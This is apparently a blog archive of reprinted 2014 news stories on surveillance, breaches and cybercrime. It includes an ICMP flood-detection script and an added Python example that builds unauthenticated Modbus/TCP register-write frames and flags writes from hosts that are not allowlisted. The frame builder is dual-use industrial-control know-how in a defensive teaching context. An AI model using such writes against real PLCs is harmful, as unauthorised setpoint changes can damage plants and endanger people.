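    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP (?P<src>[\d.]+) > (?P<dst>[\d.]+): "
    r"ICMP echo request, id \d+, seq \d+, length (?P<len>\d+)$"
)


def parse_echo_requests(text):
    """Return a list of (seconds_since_midnight, src_ip, length) per echo request."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not an echo request line: ignore it
        t = datetime.strptime(m["ts"], "%H:%M:%S.%f")
        secs = t.hour * 3600 + t.minute * 60 + t.second + t.microsecond / 1e6
        records.append((secs, m["src"], int(m["len"])))
    return records


def find_flooders(records, window=1.0, max_pkts=5, max_bytes=100_000):
    """Return {src_ip: reason} for every source that exceeds the per-window budget.

    A sliding window of `window` seconds is moved over each source's requests
    in time order; the source is flagged as soon as either the packet count or
    the byte total inside the window goes over the limit. The thresholds are
    assumptions for this example and should be tuned for the site.
    """
    by_src = defaultdict(list)
    for secs, src, length in sorted(records):
        by_src[src].append((secs, length))

    flagged = {}
    for src, events in by_src.items():
        start = 0
        bytes_in_window = 0
        for end, (t, length) in enumerate(events):
            bytes_in_window += length
            # Drop events that fell out of the window ending at time t.
            while events[start][0] < t - window:
                bytes_in_window -= events[start][1]
                start += 1
            pkts = end - start + 1
            if pkts > max_pkts:
                flagged[src] = f"{pkts} echo requests in {window}s"
                break
            if bytes_in_window > max_bytes:
                flagged[src] = f"{bytes_in_window} bytes of echo requests in {window}s"
                break
    return flagged


if __name__ == "__main__":
    for src, reason in find_flooders(parse_echo_requests(SAMPLE_LOG)).items():
        print(f"flood suspected from {src}: {reason}")
```

On the constructed input only 203.0.113.5 is reported, and it trips the byte budget after its second request even though its packet count is still under the limit. That is the point of keeping both checks: a 65500-byte echo request is fragmented on the wire and consumes far more of the link than its packet count suggests, so a per-source byte budget is the one that matters against the payload sizes used above. In production the same limits are normally enforced in the packet filter rather than reconstructed from a log.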

Sunday, 10 August 2014

Spying revelations lead to encryption boom in Germany

MOUNTAIN VIEW: Revelations about the National Security Agency's electronic eavesdropping capabilities have sparked anger in Germany and a boom in encryption services that make it hard for the most sophisticated spies to read emails, listen to calls or comb through texts.

Jon Callas, co-founder of Silent Circle, which sells an encryption app allowing users to talk and text in private, said a series of disclosures from former intelligence contractor Edward Snowden last year have been a boon for business.

Silent Circle is one of a host of online security companies cashing in on swarms of new security-conscious customers around the world who want to shield their communications from foreign governments — and nowhere is the market hotter than in Germany, whose chancellor, Angela Merkel, was reported to be a target.

"Germans have always been particularly attuned to security and privacy concerns," Callas said. "I think that culturally, Germany has seen privacy problems in their recent past. There are people who remember the communists. There is still a cultural sore spot over security and privacy, an understanding of what can go wrong better than any other place in the world."

The companies' customers range from diplomats and journalists to privacy advocates and people trying to protect trade secrets.

"If you're a reporter, you can talk confidentially to a source. If you're a banker, you can talk to a client. If you're a business person, you can use it in places where spying is a cultural norm," Callas said.

Although Silent Circle doesn't provide specific numbers, Callas said it saw a "huge increase" in subscriptions to its private phone and text service after Snowden's disclosures and a spike in Germany after two reported cases of suspected US spying there earlier this year.

And while the technology has Silicon Valley roots, the servers are in Canada and Switzerland, two countries with strong privacy protections. Two weeks ago, Silent Circle also began selling a secure smartphone, whose first run sold out, Callas said.

At CeBIT, a leading tech industry event held annually in the German city of Hannover, Deutsche Telekom was among several companies to launch new security products on the back of Snowden's revelations.

"I want to send a personal thanks to the NSA, because we wouldn't be having this discussion if that hadn't happened," Reinhard Clemens, a Deutsche Telekom board member, told reporters. "That was the best marketing campaign we've ever had."

The company, known for its T-Mobile brand in the United States, sells a smartphone app that encrypts voice and data traffic. It was developed with Berlin-based firm GSMK, an offshoot of the German hacking group Chaos Computer Club.

Customers seeking an all-in-one solution can buy GSMK's $2,750 secure cellphone that will protect confidential communications from all but the most dedicated eavesdroppers.

Chief executive Bjoern Rupp said his company has seen a surge of interest in its encryption technology since details of the NSA's surveillance capabilities leaked last year.

"Snowden is transforming the industry," Rupp told The Associated Press. "There is a completely new consciousness about security."

Since launching in 2003, the company has sold about 100,000 secure devices, but the number of apps sold in the past year is "in another dimension," said Rupp, without revealing a precise figure.

British rival Vodafone, meanwhile, launched its own "Secure Call" app at the CeBIT fair with the claim it would allow users to make "calls that are as secure as those of the German government."

Merkel herself used to be photographed with a Nokia slider phone. Since reports surfaced that the NSA had listed her among its foreign intelligence targets, the chancellor has avoided being seen with low-end devices. Her new gadget, as widely reported, is a top-range BlackBerry outfitted with a custom-made security suite made by German company Secusmart — endorsed for sensitive communications by Germany's Federal Office for Information Security.

Apparently seizing on the opportunity, BlackBerry recently announced it was buying Secusmart.

"The acquisition of Secusmart underscores our focus on addressing growing security costs and threats ranging from individual privacy to national security," BlackBerry CEO John Chen said in a statement.

Ravishankar Borgaonkar, who works with Telekom Innovation Laboratories and FG Security in Berlin, uses an app on his Samsung smartphone that detects how secure each call is with red and green buttons.

"I try to make my calls as secure as possible," he said. "I get paranoid about some stalker trying to look at my phone, because if they get in it they can get to all my data."

And as someone who works in tech, Borgaonkar said he's getting tapped a lot these days for help.

"All my friends who are not in technology are asking me if their phones are secure, and what they should do," he said.

For those who don't want to take any chances, the revelations have also sparked a retro trend. The country's business weekly Wirtschaftswoche recently reported typewriter sales rising for the first time in years.

German companies aiming to protect their trade secrets apparently have turned to typewriters to ensure their correspondence with foreign clients isn't intercepted by rivals capable of hacking into their computer networks.

Patrick Sensburg, a member of Merkel's conservative bloc and chair of the parliamentary committee investigating alleged NSA spying in Germany, even suggested — only half-jokingly — that he and his fellow lawmakers might start using typewriters to hide the panel's sensitive work.

Saturday, 9 August 2014

Hacking group wants to play nice with automakers

A group of cars for sale is pictured at a car dealership in Los Angeles, California April 1, 2014.

A group of well-known hackers and security professionals are trying to build better ties with the auto industry in an effort to enlist their help in improving vehicle security, one of the hottest areas of cyber research.
The non-profit group, known as "I am the Cavalry," is asking attendees at this weekend's Def Con hacking conference in Las Vegas to sign an open letter to "Automotive CEOs" to ask them to implement basic guidelines to defend cars from cyber attacks.
"The once distinct worlds of automobiles and cyber security have collided," said the letter. "Now is the time for the automotive industry and the security community to connect and collaborate."
Vehicles rely on tiny computers to manage everything form engines and brakes to navigation, air conditioning and windshield wipers. Security experts say it is only a matter of time before malicious hackers are able to exploit software glitches and other vulnerabilities to try to harm drivers.
The Cavalry group is scheduled to make a presentation at Def Con on Saturday about efforts to improve auto security. They will not disclose any specific problems that might embarrass carmakers, said Josh Corman, a security industry professional who co-founded the group a year ago.
That sensitivity contrasts with much of the hacking research presented these days at Def Con, which attracts more than 10,000 attendees. For instance, one high-profile paper being released this year reviewed 20 vehicle models to find the three "most hackable" cars.
The Cavalry group has been trying to smooth relations between researchers and industry by promoting responsible disclosure. That means they approach carmakers to discuss bugs before going public, giving them time to fix them.
"The goal is build trust," said Corman, chief technology officer of software firm Sonatype. "In the past, these hacking talks were 'Look at me. Look at what I did.' There wasn't much care for what happens next and how it affects the industries."
Leaders of the Cavalry - which has several hundred active members who also study medical devices, consumer electronics and critical infrastructure - have spent the past year meeting with other security experts, manufacturers, regulators and lawmakers.

On Tuesday, the group talked about hacking cars and medical devices with industry representatives in a private meeting in Las Vegas. They agreed not to publicly discuss those sessions.
Katie Moussouris, a Cavalry leader who is an executive at a startup known as HackerOne, said she encourages hackers to show empathy when approaching companies.

"It is important to show that you are not just trying to show their weakness and make them look stupid, but that you are trying to help," said Moussouris, who until recently ran outreach to security researchers for Microsoft Corp.
Wade Newton, a spokesman for the Auto Alliance, which represents 12 car makers, declined to comment on Cavalry's efforts to reach out to the industry. "Our record shows that we typically welcome the opportunity to work with a broad array of stakeholders when we have a common goal," he said.
The U.S. National Highway Traffic Safety Administration said in a statement that it is not aware of any incidents of consumer vehicle control systems that have been hacked.
Not all researchers believe in Cavalry's conciliatory approach. Charlie Miller, who co-authored the study on "most hackable" cars, said he does not think automakers will take serious action to improve security until they are shamed into doing so by someone who demonstrates code capable of remotely attacking a car and causing it to crash.
"They say they know what they are doing. But all the evidence points to the contrary," said Miller.
Jeff Moss, who founded Def Con 22 years ago and is now an advisor to the U.S. Department of Homeland Security, said there are merits to both approaches.
"Either side has a valid argument," Moss said. "It's almost like a carrot and stick approach."
(Corrects spelling of Cavalry in paragraphs 2 and 5)

Sunday, 15 June 2014

Senators urge Pentagon to end systematic faking of its accounts

Aerial view of the United States military headquarters, the Pentagon, September 28, 2008.
(Reuters) - Four senators have called on the Defense Department to end a practice that involves deliberately inserting false numbers into the Pentagon's accounting ledgers and financial reports.

The senators sent a letter to Defense Department Comptroller Robert Hale urging the Pentagon to stop an accounting practice widely known as "plugging."

The letter, dated June 12, 2014, said that plugs are fictitious dollar amounts inserted into financial ledgers to make it appear that the Pentagon’s books balance.

The letter was sent by Charles Grassley, Tom Coburn, Thomas Carper and Ron Johnson. The four senators have been pressing for a solution to severe accounting problems at the Pentagon, whose spending accounts for the largest chunk by far of the annual federal budget approved by Congress.

Grassley is the senior Republican on the Senate Judiciary Committee; the others hold top positions on the Homeland Security and Governmental Affairs Committee.

The senators said that plugs, called "reconciling amounts" by the Pentagon, totaled $9.6 billion in 2013 - an 80% increase since 2008.

The letter asked Hale and Pentagon Inspector General Jon Rymer to provide the senators with a plan to end the practice, including a specific timetable.

The legislators criticized the Office of the Inspector General - the internal Pentagon unit charged with policing the agency - for using more than $200 million worth of plugs to balance its own accounts.

"In order to play a leadership role in financial management reform, the DoD OIG should start by ending the use of plugging in its own financial statements," they wrote.

The Pentagon's practice of faking its budget numbers was the subject of a Reuters investigation last year on accounting malpractice at the Defense Department. The Senate letter to Hale and Rymer cited the findings of the Reuters series.

"The department will respond to the letter in an appropriate manner," a Pentagon spokesman said.
Michael Thiem, spokesman for the inspector general, said: "At the office of the inspector general, we are committed to accurate and transparent financial reporting." He said the office would continue "aggressive oversight" of the Defense Department to improve accounting systems. (Edited by Michael Williams)

Tuesday, 3 June 2014

U.S. disrupts major hacking, extortion ring; Russian charged

U.S. Assistant Attorney General Leslie Caldwell (at podium) of the Justice Department's Criminal Division announces criminal charges and two global cyber fraud disruptions, Gameover Zeus and Cryptolocker, at the Department of Justice in Washington June 2, 2014.
(Reuters) - A U.S.-led international operation disrupted a crime ring that infected hundreds of thousands of PCs around the globe with malicious software used for stealing banking credentials and extorting computer owners, the Justice Department said on Monday.

Authorities in nearly a dozen countries worked with private security companies to wrest control of the network of infected machines, known by the name of its master software, Gameover Zeus.

Court documents released on Monday said that between 500,000 and 1 million machines worldwide were infected with the malicious software, which was derived from the original "Zeus" trojan for stealing financial passwords that emerged in 2006.

In addition to stealing from the online accounts of businesses and consumers, the Gameover Zeus crew installed other malicious programs, including one called Cryptolocker that encrypted files and demanded payments for their release. Cryptolocker alone infected more than 234,000 machines and won $27 million in ransom payments, the Justice Department said.

The two programs together brought the gang more than $100 million, prosecutors said in court documents, including $198,000 in an unauthorized wire transfer from an unnamed Pennsylvania materials company and $750 in ransom from a police department in Massachusetts that had its investigative files encrypted. Other victims included PNC Bank, Capital One Bank [COFCB.UL] and others, according to court documents.

“These schemes were highly sophisticated and immensely lucrative, and the cyber criminals did not make them easy to reach or disrupt,” Leslie Caldwell, who heads the Justice Department's criminal division, told a news conference.

The Gameover Zeus "botnet" - short for robot network - is the largest so far disrupted that relied on a peer-to-peer distribution method, where thousands of computers could reinfect and update each other, said Dell expert Brett Stone-Gross, who assisted the FBI.

"We took control of the bots, so they would only talk with our infrastructure," Stone-Gross said.

A civil suit in Pennsylvania helped authorities get court orders to seize parts of the infected network, and on May 7, Ukrainian authorities seized and copied Gameover Zeus command servers in Kiev and Donetsk, officials said.

U.S. and other agents worked from early Friday through the weekend to seize servers around the world, freeing some 300,000 victim computers from the botnet so far.

A criminal complaint unsealed today in Nebraska, meanwhile, accused Russian Evgeniy Mikhaylovich Bogachev and others of participating in the conspiracy. U.S. officials said Bogachev was last known to be living in the Black Sea resort town of Anapa.

In an FBI affidavit filed in the Nebraska case, an agent cited online chats in which aliases associated with Bogachev claimed authorship of the original Zeus trojan, which has infected more than 13 million computers and is blamed for hundreds of millions of dollars in losses.

"That's what he claimed. There were probably a number of people involved," said Dmitri Alperovitch, co-founder of security firm CrowdStrike, which also worked with the FBI.

A person familiar with the case said that Bogachev's ICQ number, which is an assigned Internet chat query identifier, matched that of the known Zeus author.

Attempts to reach Bogachev were unsuccessful. FBI and Justice Department officials did not immediately respond to questions about Bogachev's alleged past role with Zeus, one of the most pernicious pieces of software ever developed.

Zeus's code has since been publicly released, and many variants are still being used by gangs large and small.

"Zeus is probably the most prolific and effective piece of malware discovered since 2006," said Lance James, head of cyber-intelligence at consultancy Deloitte & Touche, which also helped authorities.

Russia does not extradite accused criminals to other countries, so Bogachev may never be arrested.

He was named as part of a new policy on aggressively exposing even those the United States has little hope of catching. The recent crackdown includes the indictment of five members of China's People's Liberation Army for alleged economic espionage, which prompted denials and an angry response from Chinese authorities.

“This is the new normal,” Robert Anderson, the top FBI official in charge of combating cyber crime, said at a news conference announcing the Russian action.

When asked whether Russian authorities would turn Bogachev over to the U.S., Deputy Attorney General James Cole said “as far as Russia, we are in contact with them and we’ve been having discussions with them about moving forward and about trying to get custody of Mr. Bogachev,” but declined to provide further detail of those talks.

The shutdown of Gameover Zeus may not last. Other botnets have resurfaced as criminals regained at least partial control of their networks.

Officials at the United Kingdom's National Crime Agency said in an "urgent warning" that users might have only two weeks to clean their computers from traces of the infection. They directed users to, which was intermittently available late Monday.

The U.S. Department of Homeland Security set up a website to help victims remove the malware, The European Cybercrime Centre also participated in the operation, along with Australia, Canada, France, Germany, Italy, Japan, Luxembourg, New Zealand and Ukraine.

Intel Corp, Microsoft Corp, security software companies F-Secure, Symantec Corp, and Trend Micro; and Carnegie Mellon University supported the operation.

(Additional reporting by Julie Edwards and Alina Selyukh; Editing by Jonathan Oatis and Ken Wills)


Tuesday, 27 May 2014

China report slams U.S. for 'unscrupulous' surveillance

A magnifying glass is held in front of a computer screen in this picture illustration taken in Berlin May 21, 2013.

(Reuters) - Beijing accused the United States on Monday of "unscrupulous" cyber surveillance that included large-scale computer attacks against the Chinese government and Chinese companies.
"America's spying operations have gone far beyond the legal rationale of "anti-terrorism" and have exposed the ugly face of its pursuit of self-interest in complete disregard for moral integrity," concluded a report prepared by the China Academy of Cyber Space.
The report, titled "America's Global Surveillance Record," was published one week after the United States accused five Chinese military officers of hacking into U.S. companies to steal trade secrets.
The publication accused the United States of "waging large-scale cyber-attacks" against China. "Targets of American surveillance include the Chinese government and Chinese leaders, Chinese companies, scientific research institutes, ordinary netizens, and a large number of cell phone users," the report said.
Huawei Technologies Co, the Ministry of Commerce, the Ministry of Foreign Affairs, and Tencent Holdings Ltd's popular instant message service were among NSA targets, it said.
"U.S. spying operations penetrate every corner of China," the report said.
China last week summoned the U.S. Ambassador to China, Max Baucus, to protest against the U.S. indictment, saying it had seriously harmed relations.
The Cyber Space academy report cited foreign newspaper reports of U.S. cyber spying based on documents revealed by former National Security Agency contractor Edward Snowden.
A subsequent investigation "carried out by various Chinese government departments over several months confirmed the existence of snooping activities directed against China," the report said.
(Reporting by Matthew Miller; Editing by Ruth Pitchford)

Thursday, 22 May 2014

Hackers raid eBay in historic breach, access 145 million records

John Donahoe, chief executive of eBay, speaks at the Reuters Global Technology Summit in San Francisco, June 17, 2013.

(Reuters) - EBay Inc said that hackers raided its network three months ago, accessing some 145 million user records in what is poised to go down as one of the biggest data breaches in history, based on the number of accounts compromised.
It advised customers to change their passwords immediately, saying they were among the pieces of data stolen by cyber criminals who carried out the attack between late February and early March.
EBay spokeswoman Amanda Miller told Reuters late on Wednesday that those passwords were encrypted and that the company had no reason to believe the hackers had broken the code that scrambled them.
"There is no evidence of impact on any eBay customers," Miller said. "We don't know that they decrypted the passwords because it would not be easy to do."
She said the hackers gained access to 145 million records of which they copied "a large part". Those records contained passwords as well as email addresses, birth dates, mailing addresses and other personal information, but not financial data such as credit card numbers.
Miller also said the company has hired FireEye Inc's Mandiant forensics division to help investigate the matter. Mandiant is known for publishing a February 2013 report that described what it said was a Shanghai-based hacking group linked to the Peoples Liberation Army.
EBay earlier said a large number of accounts may have been compromised, but declined to say how many.
Security experts advised EBay customers to be on the alert for fraud, especially if they used the same passwords for other accounts.
"People need to stop reusing passwords and should change their affected passwords immediately across all the sites where they are used," said Trey Ford, global security strategist with cybersecurity firm Rapid7.
Michael Coates, director of product security with Shape Security, said there is a significant risk that the hackers would unscramble the passwords because typically companies only ask users to change passwords if they believe there is a reasonable chance attackers may be able to do so.
Still, eBay said it had not seen any indication of increased fraudulent activity on its flagship site and that there was no evidence its PayPal online payment service had been breached.
EBay said the hackers got in after obtaining login credentials for "a small number" of employees, allowing them to access eBay's corporate network.
It discovered the breach in early May and immediately brought in security experts and law enforcement to investigate, Miller said.
"We worked aggressively and as quickly as possible to insure accurate and thorough disclosure of the nature and extent of the compromise," Miller said when asked why the company had not immediately notified users.
The breach could go down as the second-biggest in history at a U.S. company, based on the number records accessed by the hackers.
Computer security experts say the biggest such breach was uncovered at software maker Adobe Systems Inc in October 2013, when hackers accessed about 152 million user accounts.
It would be larger than the one that Target Corp disclosed in December of last year, which included some 40 million payment card numbers and another 70 million customer records.
(This version of the story corrects the first, fifth and third-to-last paragraph after the company corrected its statement to say that 145 million records were accessed, but hackers only copied "a large part" of that database. The story originally said that hackers copied the entire database.)
(Additional Reporting by Joseph Menn; Editing by Christopher Cushing)

Monday, 19 May 2014

U.S. accuses China of cyber spying on six American companies

A map of China is seen through a magnifying glass on a computer screen showing binary digits in Singapore in this January 2, 2014 photo illustration.

(Reuters) - A U.S. grand jury has indicted five Chinese individuals with cyber espionage charges for allegedly targeting six American companies and stealing trade secrets, the U.S. Justice Department said, publicly accusing China of cyber spying for the first time.
The hackers targeted U.S. companies in the nuclear power, metals and solar products industries to steal information useful to competitors in China, the department said on Monday.
The companies targeted include Alcoa Inc, United States Steel Corp, Allegheny Technologies Inc, Westinghouse Electric Co and U.S. subsidiaries of SolarWorld AG, U.S. officials said.
The hackers also targeted United Steel, Paper and Forestry, Rubber, Manufacturing, Energy, Allied-Industrial and Service Workers International Union (USW), officials said.
More details were expected at a news conference later Monday with Attorney General Eric Holder and other U.S. officials.
The move "indicates that DOJ has 'smoking keyboards' and (is) willing to bring the evidence to a court of law and be more transparent," said Frank Cilluffo, head of the Homeland Security Policy Institute at the George Washington University.
American officials have long been concerned about hacking from abroad, especially China. Secret U.S. State Department cables obtained by WikiLeaks traced major systems breaches to China, Reuters reported in 2011. One 2009 cable pinpointed attacks to a specific unit of China's People's Liberation Army.
Such charges, however, are symbolic but the move would prevent the individuals indicted from traveling to the United States or other countries that have an extradition agreement with the United States.
Several cyber security experts said Monday's action showed the United States was serious about tackling the hacking concerns.
"It sends a strong message to the Chinese," James Lewis, a senior fellow at the Center for Strategic and International Studies, told Reuters.
Others remained skeptical the move would deter online invasions.
"It won't slow China down," said Eric Johnson, an information technology expert at Vanderbilt University and dean of its School of Management.
An FBI official last week told Reuters to expect multiple cyber security-related cases, including indictments and arrests, in the coming weeks.
On Sunday, a top Chinese Internet official called for Beijing to tighten its own cyber security, citing "overseas hostile forces."
(Additional reporting by Susan Heavey and Mark Hosenball and Jim Finkle in Boston; Editing by Bernadette Baum)
Saturday, 17 May 2014

U.S. industry too complacent about cyber risks, say experts

Digital Bond Founder and CEO Dale Peterson talks during a Reuters CyberSecurity Summit in Washington, May 12, 2014.

(Reuters) - After warning for years that the U.S. electric grid and other critical infrastructure are dangerously vulnerable to hacking, security experts fear it may take a major destructive attack to jolt CEOs out of their complacency.
While awareness about cybersecurity has increased in recent years, infrastructure consultants say the industry remains reluctant to spend the money needed to upgrade their aging equipment - especially in the absence of much pressure from the U.S. government, regulators or shareholders.
"I'm convinced the C-level executives don't understand the risks they're accepting," Digital Bond CEO Dale Peterson, a leading expert in industrial control systems, told the Reuters Cybersecurity Summit in Washington this week.
"These systems are insecure by design," said Peterson. "If they truly understood the risk they were taking, they would find it unacceptable."
Peterson and other security experts say the problem lies with small computers known as PLCs, or programmable logic controllers, used to control physical processes in energy plants, water treatment facilities, factories and other industries. The PLCs are designed to obey every well-formed command they receive, regardless of what effect it might have on the process, according to the experts.
To wreak havoc, someone would need only to gain access to the network that reaches the PLC and send it malicious instructions, such as commands that cause an explosion at an energy facility or chemical plant, flood a water system, or poison a food supply.
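The "insecure by design" point above is easiest to see in the wire protocol. The following is an added example, not code from the Reuters article or from Digital Bond: it assumes Modbus/TCP, a widely used PLC protocol the article does not name, and shows that a Write Single Register request carries nothing but addressing and the value to write, with no field that identifies or authenticates the sender. The second half is the compensating control a site can add when the controller itself cannot refuse the command: a parser run over constructed sample traffic that flags write requests from any host not on an allowlist. The IP addresses, register address 0x0010, the setpoint values and the allowlist are all constructed for the example.

```python
"""Modbus/TCP write frames and a minimal allowlist detector.

Added example, not from the original article. The protocol (Modbus/TCP),
the hosts, the register addresses and the allowlist are assumptions made
for illustration.
"""
import struct

# Modbus function codes that change PLC state (writes), versus reads.
WRITE_FUNCTIONS = {0x05: "Write Single Coil",
                   0x06: "Write Single Register",
                   0x0F: "Write Multiple Coils",
                   0x10: "Write Multiple Registers"}
READ_FUNCTIONS = {0x01: "Read Coils", 0x03: "Read Holding Registers"}


def build_write_single_register(tid: int, unit: int, addr: int, value: int) -> bytes:
    """Build a Modbus/TCP 'Write Single Register' (function 0x06) request.

    MBAP header: transaction id, protocol id (always 0), length of the bytes
    that follow the length field (unit id + PDU), unit id. Then the PDU:
    function code, register address, register value. No field identifies
    or authenticates the sender; any host that can reach TCP/502 may send it.
    """
    pdu = struct.pack(">BHH", 0x06, addr, value)
    mbap = struct.pack(">HHHB", tid, 0x0000, len(pdu) + 1, unit)
    return mbap + pdu


def parse_frame(frame: bytes) -> dict:
    """Parse the MBAP header and function code; decode the common single-item PDUs."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, proto, length, unit, func = struct.unpack(">HHHBB", frame[:8])
    if proto != 0:
        raise ValueError("not Modbus (protocol id %d)" % proto)
    if length != len(frame) - 6:
        raise ValueError("length field %d disagrees with frame size" % length)
    out = {"tid": tid, "unit": unit, "function": func,
           "is_write": func in WRITE_FUNCTIONS}
    if func in (0x05, 0x06):          # single coil / single register: address, value
        out["address"], out["value"] = struct.unpack(">HH", frame[8:12])
    elif func == 0x03:                # read holding registers: address, quantity
        out["address"], out["quantity"] = struct.unpack(">HH", frame[8:12])
    return out


def flag_unauthorized_writes(packets, allowed_writers):
    """Return (src_ip, parsed_frame) for each write request from a non-allowlisted host.

    packets: iterable of (src_ip, frame_bytes) as a passive network sensor
    on the control network would see them.
    """
    hits = []
    for src, frame in packets:
        try:
            parsed = parse_frame(frame)
        except ValueError:
            continue  # not a well-formed Modbus request; a real sensor would log it
        if parsed["is_write"] and src not in allowed_writers:
            hits.append((src, parsed))
    return hits


# Constructed sample traffic: the HMI at 10.0.0.10 reads and writes as expected,
# then an unexpected host at 10.0.0.99 rewrites the same setpoint register.
SAMPLE_PACKETS = [
    ("10.0.0.10", struct.pack(">HHHBBHH", 1, 0, 6, 1, 0x03, 0x0000, 0x000A)),  # read 10 registers
    ("10.0.0.10", build_write_single_register(2, 1, 0x0010, 1500)),           # setpoint 1500
    ("10.0.0.99", build_write_single_register(7, 1, 0x0010, 9000)),           # setpoint 9000
]
ALLOWED_WRITERS = {"10.0.0.10"}

if __name__ == "__main__":
    for src, parsed in flag_unauthorized_writes(SAMPLE_PACKETS, ALLOWED_WRITERS):
        print("ALERT: %s sent %s to unit %d addr 0x%04X value %d" % (
            src, WRITE_FUNCTIONS[parsed["function"]], parsed["unit"],
            parsed["address"], parsed["value"]))
```

The detector only answers "who is writing", which is the one question the PLC cannot ask for itself; it says nothing about whether 9000 is a safe value for that register, and an allowlisted HMI that has been compromised passes unchallenged. Those limits are why experts in the article argue for fixing the equipment rather than relying on monitoring around it.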
Top executives at critical infrastructure companies think of cybersecurity as a standard business risk and are reluctant to spend millions of dollars to mitigate that risk, said Stuart McClure, chief executive of cybersecurity firm Cylance.
They "can't seem to get out of their own way of paranoia to a point of paralysis," McClure told the summit. "What government does have to do, unfortunately, is to step in and provide a stick of some sort."
The Obama administration has encouraged industries to test themselves against a newly drafted set of cyber standards, and has encouraged more sharing of information about cyber threats and best practices.
Experts say that is a step in the right direction, but there is still a long way to go. Some urged the Department of Homeland Security to mandate stricter regulations, but the agency does not have that kind of enforcement power.
"I think what they benefit most from is not just hard and fast regulation: 'You shall do it this way,'" Department of Homeland Security Secretary Jeh Johnson said at the summit. "I don't believe that the answer is to regulate standards."
DHS's Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) says it responded to reports of 256 cyber incidents last year, more than half of them in the energy sector. While that is nearly double the agency's 2012 case load, not a single incident caused a major disruption.
The incidents include hacking into systems through Internet portals exposed over the Web, injecting malicious software through thumb drives, and exploitation of software vulnerabilities, DHS said.
"I fear that things won't change until there is a major attack and people are shocked into taking action," McClure said.
Still, he and several other summit guests said they have noticed an increase in interest in cybersecurity following the data breach at Target Corp (TGT.N), which led to the departure of the U.S. retailer's chief executive, Gregg Steinhafel.
"This is ringing bells at the C-suite," said Charles Croom, vice president of cybersecurity solutions at Lockheed Martin Corp (LMT.N). "This is just the beginning of a bow wave."
While some security experts hope the government can take a stronger role on cybersecurity, some U.S. officials say the private sector needs to step up.
The new head of the National Security Agency, Admiral Mike Rogers, said he hopes industry and the government can work quickly enough to improve communication about emerging cyber threats and prevent catastrophes.
"I don't want a major disaster being the driver that pushes us," Rogers told the summit.
(Reporting by Jim Finkle and Alina Selyukh; Additional reporting by Doina Chiacu, Mark Hosenball, Joseph Menn and Andrea Shalal; Editing by Tiffany Wu)